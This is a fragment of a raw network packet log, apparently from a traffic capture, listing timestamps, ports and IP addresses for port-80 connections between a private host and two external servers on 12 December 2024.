Dec 12, 2024 16:48:45.621943951 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.622874975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.622941017 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.623898029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.623924017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.623934031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.624083042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.624922991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.624991894 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.625376940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.625897884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.625952005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.625973940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.626914024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.626981020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.627985954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.628021002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.628174067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.628448009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.628983021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.629017115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.629055023 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.629955053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.630023956 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.631030083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.631062984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.631146908 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.631186008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.632040977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.632108927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.632138014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.633023977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.633090019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.633601904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.634088993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.634164095 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.634210110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.635094881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.635150909 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.635206938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.636094093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.636627913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.636689901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.637106895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.637181044 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.637238979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.638186932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.638287067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.638315916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.639178038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.639234066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.639342070 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.640120029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.640198946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.641165018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.641212940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.641247034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.641273022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.642127037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.642235041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.642817020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.643168926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.643202066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.643237114 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.644144058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.644226074 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.644298077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.645174980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.645245075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.645526886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.646228075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.646297932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.646524906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.647187948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.647254944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.647345066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.648214102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.649282932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.649316072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.649349928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.649380922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.649410009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.650227070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.650356054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.650392056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.651226044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.651521921 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.651998997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.652339935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.652401924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.652415991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.697216034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.752664089 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752757072 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.752760887 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752772093 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752779007 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752806902 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752847910 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.752847910 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.752891064 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752901077 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752913952 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752924919 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752934933 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.752963066 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.752963066 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.753046036 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.793375015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.793406963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.793570995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.793621063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.793782949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.793859005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.794389963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.794632912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.794759035 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.795398951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.795515060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.795617104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.796400070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.797465086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.797486067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.797504902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.797580004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.797607899 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.798464060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.799108028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.799210072 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.799568892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.799592018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.799684048 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.800523043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.800595999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.800692081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.801553965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.801590919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.802510977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.802623987 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.803616047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.803642035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.803662062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.804500103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.804565907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.805562973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.805577040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.805583954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.805666924 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.806600094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.806854010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.806976080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.807600975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.807621002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.807719946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.808561087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.808701038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.809180021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.809586048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.809986115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.810103893 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.810664892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.810672998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.811180115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.811717033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.811780930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.811897993 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.812684059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.812720060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.812804937 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.813802004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.813930988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.814042091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.814706087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.814714909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.814805984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.815785885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.815804958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.815968037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.816667080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.817040920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.817548037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.817830086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.817837000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.817926884 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.818742037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.818825006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.818921089 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.819720030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.819950104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.820092916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.820820093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.820923090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.821041107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.821736097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.822809935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.822817087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.822823048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.822911024 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.823769093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.823956966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.824016094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.824836969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.825150967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.825270891 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.825839043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.826739073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.826798916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.826865911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.826872110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.826910019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.827837944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.827918053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.827982903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.828906059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.829015017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.829068899 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.829917908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.830905914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.830915928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.831011057 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.831017017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.831715107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.831909895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.832355022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.832469940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.832966089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.834055901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.834065914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.834074020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.834173918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.834925890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.835216999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.835325956 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.835984945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.837033033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.837107897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.837117910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.837189913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.838104963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.838645935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.838824987 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.839047909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.839107037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.839379072 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.840078115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.841073036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.841084957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.841109991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.841228008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.842056036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.842398882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.842539072 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.843071938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.843346119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.843394995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.844073057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.844127893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.844207048 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.845046997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.845302105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.845652103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.846086025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.872534990 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.872620106 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.872821093 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.900355101 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.945157051 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.945269108 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.945499897 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.949383020 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.950588942 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.951105118 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.957830906 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.957921028 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.958161116 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.966186047 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.966747999 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.966967106 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.974695921 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.975764036 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.975830078 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.976011992 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.983264923 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.983429909 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.983598948 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.985975027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.985991955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.986155033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.986409903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.986588001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.986634970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.987466097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.988023996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.988447905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.988580942 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.988877058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.989460945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.989578009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.990330935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.990411043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.990478992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.991456985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.991553068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.991576910 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.991592884 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.991612911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.991631031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.991679907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.991910934 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:45.992657900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.992799997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.993712902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.993803024 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.994748116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.994756937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.994764090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.994822025 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.995619059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.995882988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.996576071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.997181892 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.997627020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.997637033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.997656107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.997709990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.998574018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.999267101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.999665976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.999669075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.999677896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.999747992 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.999846935 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.999856949 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:45.999905109 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.000685930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.001710892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.001718044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.001739025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.001811981 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.001858950 CET	49946	80	192.168.2.10	185.81.68.147
